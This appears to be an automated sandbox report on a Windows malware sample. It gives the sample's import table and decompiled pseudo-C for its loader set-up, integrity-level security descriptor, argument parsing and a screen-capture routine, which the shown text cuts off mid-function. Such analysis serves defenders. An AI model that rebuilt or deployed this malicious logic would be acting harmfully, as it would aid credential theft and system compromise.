ADVAPI32.dll | IsWellKnownSid, GetLengthSid, InitiateSystemShutdownExW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegSetValueExW, CryptHashData, EqualSid, ConvertSidToStringSidW
SHLWAPI.dll | PathIsURLW, PathRemoveBackslashW, StrCmpNIW, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathFindFileNameW, PathIsDirectoryW, wvnsprintfW, UrlUnescapeA, StrStrIW, StrStrIA, PathRemoveFileSpecW, PathQuoteSpacesW, PathRenameExtensionW
SHELL32.dll | CommandLineToArgvW, SHGetFolderPathW, ShellExecuteW
Secur32.dll | GetUserNameExW
ole32.dll | StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll | CreateCompatibleBitmap, GetDIBits, CreateDIBSection, SetViewportOrgEx, DeleteDC, GdiFlush, DeleteObject, SelectObject, SetRectRgn, CreateCompatibleDC, GetDeviceCaps, RestoreDC, SaveDC
WS2_32.dll | getaddrinfo, recvfrom, getpeername, send, closesocket, WSASend, WSAGetLastError, accept, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, shutdown, setsockopt, bind, socket, WSASetLastError, select, getsockname, sendto, recv, freeaddrinfo, listen
CRYPT32.dll | PFXExportCertStoreEx, CertDuplicateCertificateContext, CertEnumCertificatesInStore, PFXImportCertStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, CryptUnprotectData
WININET.dll | HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, HttpSendRequestW, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpSendRequestExA, HttpAddRequestHeadersA, InternetQueryOptionA, InternetOpenA, HttpSendRequestA, HttpOpenRequestA, InternetSetOptionA, InternetReadFile, InternetCrackUrlA, InternetQueryOptionW, InternetConnectA, HttpQueryInfoA, InternetCloseHandle
OLEAUT32.dll | VariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dll | NetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

No network behavior found

Code Manipulations

System Behavior

General

Start time:16:36:28
Start date:28/02/2021
Path:C:\Users\user\Desktop\MjjnJ90i5q.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\MjjnJ90i5q.exe'
Imagebase:0x400000
File size:141824 bytes
MD5 hash:6C7E2255031FDBB8EFD157C2B4179319
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis

    Executed Functions

    C-Code - Quality: 87%
    			E00405EFF(signed int** __ecx, void* __edx, signed char _a4) {
    				char _v522;
    				char _v972;
    				char _v1364;
    				char _v1384;
    				intOrPtr _v1392;
    				intOrPtr _v1396;
    				signed int _v1400;
    				intOrPtr _v1404;
    				signed int** _v1408;
    				struct HINSTANCE__* _v1412;
    				void* __edi;
    				void* __esi;
    				signed int _t40;
    				struct HINSTANCE__* _t43;
    				struct HINSTANCE__* _t47;
    				_Unknown_base(*)()* _t53;
    				void* _t54;
    				signed int _t57;
    				void** _t58;
    				void** _t60;
    				signed int _t62;
    				signed int _t64;
    				signed int _t65;
    				signed int _t67;
    				void* _t73;
    				intOrPtr _t77;
    				signed int _t78;
    				signed int _t79;
    				signed int _t80;
    				struct HINSTANCE__* _t81;
    				int _t83;
    				signed int _t86;
    				void* _t89;
    				signed int* _t91;
    				signed int _t95;
    				WCHAR* _t97;
    				void* _t98;
    				signed int* _t100;
    				void* _t109;
    				void* _t110;
    				void* _t111;
    				void* _t112;
    
    				_t89 = __edx;
    				_t87 = __ecx;
    				_t95 = _a4 & 0x00000001;
    				_v1400 = _t95;
    				if(_t95 != 0) {
    					_t83 = 0;
    					__eflags = 0;
    				} else {
    					_t83 = 0;
    					 *0x422530 = 0;
    				}
    				_t91 = E00405BBA();
    				 *0x422548 = _t91;
    				if(_t91 == _t83) {
    					L27:
    					_t40 = 0;
    				} else {
    					if(_t95 != _t83) {
    						_v1400 = E00405AF4(_t87, _t89, _t91, "GetProcAddress");
    						_v1400 = E00405AF4(_t87, _t89, _t91, "LoadLibraryA");
    						_t43 =  *0x422544; // 0x400000
    						_t5 = _t43 + 0x3c; // 0xd8
    						_v1412 = _t43;
    						_t87 =  *_t5 + _t43 + 0x80;
    						__eflags = _v1400 - _t83;
    						if(_v1400 == _t83) {
    							goto L21;
    						} else {
    							__eflags = _v1396 - _t83;
    							if(_v1396 == _t83) {
    								goto L21;
    							} else {
    								_t91 =  *_t87;
    								__eflags = _t91 - _t83;
    								if(_t91 <= _t83) {
    									goto L21;
    								} else {
    									__eflags = _t87[1] - 0x14;
    									if(_t87[1] <= 0x14) {
    										goto L21;
    									} else {
    										_t91 = _t91 + _t43;
    										__eflags =  *_t91 - _t83;
    										if( *_t91 == _t83) {
    											goto L21;
    										} else {
    											while(1) {
    												_t77 = _v1392(_t91[3] + _v1404);
    												_v1392 = _t77;
    												__eflags = _t77 - _t83;
    												if(_t77 == _t83) {
    													goto L27;
    												}
    												_t100 = _v1408 +  *_t91;
    												_t86 = _v1408 + _t91[4];
    												while(1) {
    													_t78 =  *_t100;
    													__eflags = _t78;
    													if(__eflags == 0) {
    														break;
    													}
    													if(__eflags >= 0) {
    														_t87 = _v1408;
    														_t79 =  &(_v1408[0]) + _t78;
    													} else {
    														_t79 = _t78 & 0x0000ffff;
    													}
    													_t80 = _v1400(_v1392, _t79);
    													__eflags = _t80;
    													if(_t80 == 0) {
    														goto L27;
    													} else {
    														 *_t86 = _t80;
    														_t100 =  &(_t100[1]);
    														_t86 = _t86 + 4;
    														__eflags = _t86;
    														continue;
    													}
    													goto L47;
    												}
    												_t91 =  &(_t91[5]);
    												_t83 = 0;
    												__eflags =  *_t91;
    												if( *_t91 != 0) {
    													continue;
    												} else {
    													goto L21;
    												}
    												goto L47;
    											}
    											goto L27;
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 = GetModuleHandleW(_t83);
    						 *0x422544 = _t81;
    						if(_t81 == _t83) {
    							goto L27;
    						} else {
    							L21:
    							_t97 =  &_v1384;
    							E00419DD3(0xe5, _t97);
    							_t47 = GetModuleHandleW(_t97);
    							 *0x42254c = _t47;
    							if(_t47 == _t83) {
    								goto L27;
    							} else {
    								_t98 = GetProcAddress;
    								 *0x422550 = GetProcAddress(_t47, "NtCreateThread");
    								 *0x422554 = GetProcAddress( *0x42254c, "NtCreateUserProcess");
    								 *0x422558 = GetProcAddress( *0x42254c, "NtQueryInformationProcess");
    								 *0x42255c = GetProcAddress( *0x42254c, "RtlUserThreadStart");
    								 *0x422560 = GetProcAddress( *0x42254c, "LdrLoadDll");
    								_t53 = GetProcAddress( *0x42254c, "LdrGetDllHandle");
    								 *0x422564 = _t53;
    								_t109 =  *0x422550 - _t83; // 0x77a299e0
    								if(_t109 != 0) {
    									L24:
    									_t111 =  *0x422558 - _t83; // 0x77a29670
    									if(_t111 == 0) {
    										goto L27;
    									} else {
    										_t112 =  *0x422560 - _t83; // 0x779f7840
    										if(_t112 == 0 || _t53 == _t83) {
    											goto L27;
    										} else {
    											_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
    											 *0x423c58 = _t54;
    											__eflags = _t54 - _t83;
    											if(_t54 != _t83) {
    												 *0x422423 = 1;
    											} else {
    												 *0x423c58 = GetProcessHeap();
    												 *0x422423 = 0;
    											}
    											 *0x422e8c = _t83;
    											 *0x422422 = 0;
    											InitializeCriticalSection(0x422a30);
    											 *0x422a48 = _t83; // executed
    											__imp__#115(0x202,  &_v1364); // executed
    											_t57 = E00405BF4(_a4, _t87, _t91, _t98);
    											__eflags = _t57;
    											if(_t57 == 0) {
    												goto L27;
    											} else {
    												__eflags = _v1408 - _t83;
    												if(_v1408 != _t83) {
    													L34:
    													_t58 = E00412FD8(_t87, 0xffffffff, 0x422540);
    													 *0x422534 = _t58;
    													__eflags = _t58 - _t83;
    													if(_t58 == _t83) {
    														goto L27;
    													} else {
    														 *0x422538 = GetLengthSid( *_t58);
    														_t60 =  *0x422534; // 0x0
    														 *0x42253c = E00412D70( *_t60, _t59);
    														_t62 = E00405C73(_t61, _a4);
    														__eflags = _t62;
    														if(_t62 == 0) {
    															goto L27;
    														} else {
    															 *0x4227a0 = GetCurrentProcessId();
    															 *0x4227a4 = _t83;
    															__eflags = _v1408 - _t83;
    															if(_v1408 != _t83) {
    																_t64 = 1;
    															} else {
    																_t64 = E00405CD5();
    															}
    															__eflags = _t64;
    															if(_t64 == 0) {
    																goto L27;
    															} else {
    																__eflags = _v1408 - _t83;
    																if(_v1408 == _t83) {
    																	E004065EC( &_v972);
    																	_t87 = 0x42299e;
    																	E0041601A(0x42299e, 0x4227a8,  *0x42253c,  &_v522, _t83);
    																}
    																_t65 = E00405D27(_a4);
    																__eflags = _t65;
    																if(_t65 == 0) {
    																	goto L27;
    																} else {
    																	__eflags = _a4 & 0x00000002;
    																	 *0x423c68 = _t83;
    																	 *0x422a70 = 0;
    																	 *0x4223c0 = 0;
    																	 *0x423e10 = 0;
    																	 *0x423d90 = 0;
    																	 *0x423d10 = 0;
    																	 *0x423ca8 = 0;
    																	if(__eflags == 0) {
    																		_t67 = 1;
    																	} else {
    																		_t67 = E00405DDE(_t87, _t89, __eflags);
    																	}
    																	__eflags = _t67;
    																	_t38 = _t67 != 0;
    																	__eflags = _t38;
    																	_t40 = _t67 & 0xffffff00 | _t38;
    																}
    															}
    														}
    													}
    												} else {
    													_t73 = CreateEventW(0x422568, 1, _t83, _t83);
    													 *0x4229f8 =  *0x4229f8 | 0xffffffff;
    													 *0x4229f4 = _t73;
    													__eflags = _t73 - _t83;
    													if(_t73 == _t83) {
    														goto L27;
    													} else {
    														goto L34;
    													}
    												}
    											}
    										}
    									}
    								} else {
    									_t110 =  *0x422554 - _t83; // 0x77a2a120
    									if(_t110 == 0) {
    										goto L27;
    									} else {
    										goto L24;
    									}
    								}
    							}
    						}
    					}
    				}
    				L47:
    				return _t40;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00405F40
    • GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406016
    • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406035
    • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00406047
    • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00406059
    • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040606B
    • GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040607D
    • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040608F
    • HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 004060C8
    • GetProcessHeap.KERNEL32(?,?,00000000), ref: 004060D7
    • InitializeCriticalSection.KERNEL32(00422A30,?,?,00000000), ref: 00406104
    • WSAStartup.WS2_32(00000202,?), ref: 0040611A
    • CreateEventW.KERNEL32(00422568,00000001,00000000,00000000,?,?,00000000), ref: 0040613B
    • GetLengthSid.ADVAPI32(00000000,000000FF,00422540,?,?,00000000), ref: 00406170
    • GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 0040619D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
    • String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
    • API String ID: 3091071419-305303173
    • Opcode ID: 9ab8c5f03515526c1c65749a3a8782ff169973579631a05e7255d9ddbe00d3ce
    • Instruction ID: 72842e49fc3667fb30e083800423b24795e52e75ec42b08aad1e89e6e6d83850
    • Opcode Fuzzy Hash: 9ab8c5f03515526c1c65749a3a8782ff169973579631a05e7255d9ddbe00d3ce
    • Instruction Fuzzy Hash: E0919071640342BFCB20EF65EE8461A7BA4FB04309B51443FE446B72A1D7B88996CF5E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00414FB0(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
    				signed int _v8;
    				struct _ACL* _v12;
    				int _v16;
    				int _v20;
    				void** _t19;
    				struct _SECURITY_DESCRIPTOR* _t28;
    				intOrPtr* _t29;
    
    				_t29 = __esi;
    				_t28 = __edi;
    				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
    					return 0;
    				} else {
    					_t19 =  &_v8;
    					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
    					if(_t19 == 0) {
    						L6:
    						_v8 = _v8 | 0xffffffff;
    						L7:
    						if(_t29 != 0) {
    							 *_t29 = 0xc;
    							 *(_t29 + 4) = _t28;
    							 *((intOrPtr*)(_t29 + 8)) = 0;
    						}
    						return _v8;
    					}
    					_v12 = 0;
    					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
    						LocalFree(_v8);
    						goto L6;
    					} else {
    						goto L7;
    					}
    				}
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(00422574,00000001,00000000,00406128,?,?,00000000), ref: 00414FBA
    • SetSecurityDescriptorDacl.ADVAPI32(00422574,00000001,00000000,00000000,?,?,00000000), ref: 00414FCB
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00414FE1
    • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 00414FFD
    • SetSecurityDescriptorSacl.ADVAPI32(00422574,?,?,?,?,?,00000000), ref: 00415011
    • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 0041501E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
    • String ID: S:(ML;;NRNWNX;;;LW)
    • API String ID: 2050860296-820036962
    • Opcode ID: 4ba46da086e5b333583ac26969431c6ab3c47b464b3cd1d8861d5bd78347aa53
    • Instruction ID: 3c6fd052f6bd8593f09a9288accafee790c45220e45dfd6fd4f379285c8a9b4e
    • Opcode Fuzzy Hash: 4ba46da086e5b333583ac26969431c6ab3c47b464b3cd1d8861d5bd78347aa53
    • Instruction Fuzzy Hash: 50114F71900609FFEB219FE08E84AEFBBBCAB48740F10446AF551F11A0D7758A849B54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			_entry_(signed int __ecx, void* __edx, void* __eflags) {
    				char _v5;
    				int _v12;
    				char _v16;
    				char _v20;
    				void* _t22;
    				void* _t28;
    				char _t29;
    				char _t33;
    				signed int _t36;
    
    				_t34 = __ecx;
    				_t33 = 0; // executed
    				_t22 = E00405EFF(__ecx, __edx, 0); // executed
    				if(_t22 == 0) {
    					L24:
    					__eflags = _t33;
    					_t21 = _t33 == 0;
    					__eflags = _t21;
    					ExitProcess(0 | _t21);
    				}
    				_v20 = 0;
    				_v16 = 1;
    				_v5 = 0;
    				SetErrorMode(0x8007);
    				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
    				if(_t28 == 0) {
    					L19:
    					_t29 = E00406B42(_t34, __eflags, _v20, _v16);
    					L20:
    					_t33 = _t29;
    					L21:
    					if(_t33 == 0 || ( *0x422530 & 0x00000002) == 0) {
    						goto L24;
    					} else {
    						Sleep(0xffffffff);
    						return _t29;
    					}
    				}
    				_t36 = 0;
    				if(_v12 <= 0) {
    					L14:
    					LocalFree(_t28);
    					_t48 = _t33;
    					if(_t33 == 0) {
    						__eflags = _v5;
    						if(__eflags == 0) {
    							goto L19;
    						}
    						E0041AB48(_t36);
    						_t29 = E0040C3B1();
    						__eflags =  *0x422530 & 0x00000004;
    						_t33 = _t29;
    						if(( *0x422530 & 0x00000004) != 0) {
    							_t29 = E0041A9C1(0x423e78, 0);
    						}
    						goto L21;
    					}
    					_t29 = E00406954(_t48);
    					goto L20;
    				} else {
    					goto L3;
    				}
    				do {
    					L3:
    					_t34 =  *(_t28 + _t36 * 4);
    					if(_t34 != 0 &&  *_t34 == 0x2d) {
    						_t34 =  *(_t34 + 2) & 0x0000ffff;
    						if(_t34 == 0x66) {
    							_v20 = 1;
    						} else {
    							if(_t34 == 0x69) {
    								_t33 = 1;
    							} else {
    								if(_t34 == 0x6e) {
    									_v16 = 0;
    								} else {
    									if(_t34 == 0x76) {
    										_v5 = 1;
    									}
    								}
    							}
    						}
    					}
    					_t36 = _t36 + 1;
    				} while (_t36 < _v12);
    				goto L14;
    			}

    APIs
      • Part of subcall function 00405EFF: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00405F40
      • Part of subcall function 00405EFF: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406016
      • Part of subcall function 00405EFF: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406035
      • Part of subcall function 00405EFF: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00406047
      • Part of subcall function 00405EFF: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00406059
      • Part of subcall function 00405EFF: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040606B
      • Part of subcall function 00405EFF: GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040607D
      • Part of subcall function 00405EFF: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040608F
    • SetErrorMode.KERNEL32(00008007,00000000), ref: 00406EB0
    • GetCommandLineW.KERNEL32(?), ref: 00406EBA
    • CommandLineToArgvW.SHELL32(00000000), ref: 00406EC1
    • LocalFree.KERNEL32(00000000), ref: 00406F16
    • Sleep.KERNEL32(000000FF,?,00000001), ref: 00406F6C
    • ExitProcess.KERNEL32 ref: 00406F7D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
    • String ID: x>B
    • API String ID: 1184560534-2092227387
    • Opcode ID: 3b39ccae79459fe9462b7ae4b7f449ee0f08039604567dd5c304a10e441a3a3a
    • Instruction ID: 984bf75f5068c7dd1c484d0075aed456edeaacdbc13feb2093e863f46ac6093e
    • Opcode Fuzzy Hash: 3b39ccae79459fe9462b7ae4b7f449ee0f08039604567dd5c304a10e441a3a3a
    • Instruction Fuzzy Hash: 6C214E3094924765DF2077B4A9197BE3BA55F02304F1940BFEA43B62D1CB7D4969870E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E00415F64() {
    				void* _t30;
    				void* _t33;
    				intOrPtr* _t35;
    				void* _t36;
    				void* _t39;
    				void* _t41;
    
    				_t39 = _t41 - 0x74;
    				_t17 = _t39 - 0x260;
    				 *((char*)(_t39 + 0x73)) = 0;
    				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
    				if(_t17 != 0) {
    					L8:
    					E00411A74(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
    				} else {
    					PathAddBackslashW(_t39 - 0x260);
    					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
    					while(1) {
    						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
    						if(_t17 != 0) {
    							break;
    						}
    						PathRemoveBackslashW(_t39 - 0x260);
    						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
    							goto L8;
    						} else {
    							PathAddBackslashW(_t39 - 0x260);
    							continue;
    						}
    						goto L9;
    					}
    					if( *((short*)(_t39 - 0x44)) != 0x7b) {
    						goto L8;
    					} else {
    						 *((short*)(_t39 + 8)) = 0;
    						_t17 = _t39 - 0x44;
    						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
    						if(_t17 != 0) {
    							goto L8;
    						} else {
    							 *((char*)(_t39 + 0x73)) = 1;
    						}
    					}
    				}
    				L9:
    				return  *((intOrPtr*)(_t39 + 0x73));
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,75144EE0,00000000), ref: 00415F83
    • PathAddBackslashW.SHLWAPI(?), ref: 00415F9A
    • PathRemoveBackslashW.SHLWAPI(?), ref: 00415FAB
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 00415FB8
    • PathAddBackslashW.SHLWAPI(?), ref: 00415FC9
    • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 00415FD8
    • CLSIDFromString.OLE32(?,?), ref: 00415FF2
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
    • String ID:
    • API String ID: 613918483-0
    • Opcode ID: 5634f72f302c6f28179f12b1d3e664314895bb2bd24a3c1b8eef413f4e4023af
    • Instruction ID: 5ac05843595b79cf8aa99d0773d9710e68670594775d1acf9cf294d696bbe35f
    • Opcode Fuzzy Hash: 5634f72f302c6f28179f12b1d3e664314895bb2bd24a3c1b8eef413f4e4023af
    • Instruction Fuzzy Hash: 7211727150410CAADF20DBB0DD88EDF7BBCAF08384F144466F514E3160D235DE899B64
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 38%
    			E0041A1A9(WCHAR* _a4, char _a8, signed short _a12) {
    				struct HINSTANCE__* _v12;
    				struct HINSTANCE__* _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				void* _v28;
    				void* _v32;
    				struct HDC__* _v36;
    				_Unknown_base(*)()* _v40;
    				_Unknown_base(*)()* _v44;
    				struct tagPOINT _v52;
    				_Unknown_base(*)()* _v56;
    				struct HINSTANCE__* _v60;
    				_Unknown_base(*)()* _v64;
    				_Unknown_base(*)()* _v68;
    				_Unknown_base(*)()* _v72;
    				_Unknown_base(*)()* _v76;
    				_Unknown_base(*)()* _v80;
    				_Unknown_base(*)()* _v84;
    				_Unknown_base(*)()* _v88;
    				struct HINSTANCE__* _v92;
    				struct HINSTANCE__* _v96;
    				struct HINSTANCE__* _v100;
    				char _v104;
    				_Unknown_base(*)()* _v108;
    				intOrPtr _v112;
    				char _v116;
    				_Unknown_base(*)()* _v120;
    				char _v148;
    				signed int _v152;
    				struct _ICONINFO _v172;
    				char _v188;
    				struct HINSTANCE__* _t169;
    				_Unknown_base(*)()* _t176;
    				struct HINSTANCE__* _t181;
    				_Unknown_base(*)()* _t182;
    				struct HINSTANCE__* _t183;
    				_Unknown_base(*)()* _t191;
    				struct HDC__* _t197;
    				struct HICON__* _t199;
    				signed int _t200;
    				intOrPtr _t202;
    				intOrPtr _t204;
    				void* _t206;
    				void* _t223;
    				intOrPtr* _t224;
    				void* _t239;
    				void* _t248;
    				unsigned int _t260;
    				intOrPtr* _t262;
    				signed short _t263;
    				intOrPtr _t264;
    				WCHAR** _t265;
    				intOrPtr _t268;
    				signed int _t269;
    				signed int _t272;
    				void* _t275;
    
    				_v32 = 0;
    				_v60 = 0;
    				_v16 = 0;
    				_v104 = 1;
    				_v100 = 0;
    				_v96 = 0;
    				_v92 = 0;
    				_t169 = LoadLibraryA("gdiplus.dll");
    				_v20 = _t169;
    				_v24 = GetProcAddress(_t169, "GdiplusStartup");
    				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
    				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
    				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
    				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
    				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
    				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
    				_v108 = _t176;
    				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
    					L66:
    					if(_v20 != 0) {
    						FreeLibrary(_v20);
    					}
    					if(_v60 != 0) {
    						FreeLibrary(_v60);
    					}
    					if(_v16 != 0) {
    						FreeLibrary(_v16);
    					}
    					return _v32;
    				} else {
    					_t181 = LoadLibraryA("ole32.dll");
    					_v60 = _t181;
    					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
    					_v120 = _t182;
    					if(_t182 == 0) {
    						goto L66;
    					}
    					_t183 = LoadLibraryA("gdi32.dll");
    					_v16 = _t183;
    					_t262 = GetProcAddress(_t183, "CreateDCW");
    					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
    					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
    					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
    					_v56 = GetProcAddress(_v16, "SelectObject");
    					_v76 = GetProcAddress(_v16, "BitBlt");
    					_v84 = GetProcAddress(_v16, "DeleteObject");
    					_t191 = GetProcAddress(_v16, "DeleteDC");
    					_v68 = _t191;
    					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
    						goto L66;
    					} else {
    						_push(0);
    						_push( &_v104);
    						_push( &_v116);
    						_v104 = 1;
    						_v100 = 0;
    						_v96 = 0;
    						_v92 = 0;
    						if(_v24() != 0) {
    							goto L66;
    						}
    						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
    						_v24 = _t268;
    						if(_t268 == 0) {
    							L65:
    							_v80(_v116);
    							goto L66;
    						}
    						_t197 = _v12(_t268);
    						_v36 = _t197;
    						if(_t197 == 0) {
    							L64:
    							_v68(_v24);
    							goto L65;
    						}
    						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
    						_v12 = _t199;
    						if(_t199 == 0) {
    							L24:
    							_t263 = 0;
    							goto L26;
    						} else {
    							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
    								_v12 = 0;
    							}
    							if(_v12 != 0) {
    								_t263 = _a12;
    								L26:
    								if(_t263 == 0) {
    									_t200 = _v28(_t268, 8);
    									_t269 = _t200;
    									_a12 = _v28(_v24, 0xa);
    								} else {
    									_t269 = _t263 & 0x0000ffff;
    									_a12 = _t269;
    								}
    								_t202 = _v44(_v24, _t269, _a12);
    								_v44 = _t202;
    								if(_t202 == 0) {
    									L63:
    									_v68(_v36);
    									goto L64;
    								} else {
    									_t204 = _v56(_v36, _t202);
    									_v112 = _t204;
    									if(_t204 == 0) {
    										L62:
    										_v84(_v44);
    										goto L63;
    									}
    									_t206 = 0;
    									_t248 = 0;
    									if(_t263 != 0) {
    										_t260 = (_t263 & 0x0000ffff) >> 1;
    										_t206 =  <  ? 0 : _v52.x - _t260;
    										_t248 =  <  ? 0 : _v52.y - _t260;
    										_t81 =  &_v52;
    										 *_t81 = _v52.x - _t206;
    										if( *_t81 < 0) {
    											_v52.x = 0;
    										}
    										_t84 =  &(_v52.y);
    										 *_t84 = _v52.y - _t248;
    										if( *_t84 < 0) {
    											_v52.y = 0;
    										}
    									}
    									_push(0x40cc0020);
    									_push(_t248);
    									_push(_t206);
    									_push(_v24);
    									_push(_a12);
    									_push(_t269);
    									_push(0);
    									_push(0);
    									_push(_v36);
    									if(_v76() == 0) {
    										L61:
    										_v56(_v36, _v112);
    										goto L62;
    									} else {
    										if(_v12 != 0) {
    											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
    											_t239 = _v52.y - _v172.yHotspot;
    											_t240 =  <  ? 0 : _t239;
    											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
    										}
    										_push( &_v12);
    										_push(0);
    										_push(_v44);
    										_v12 = 0;
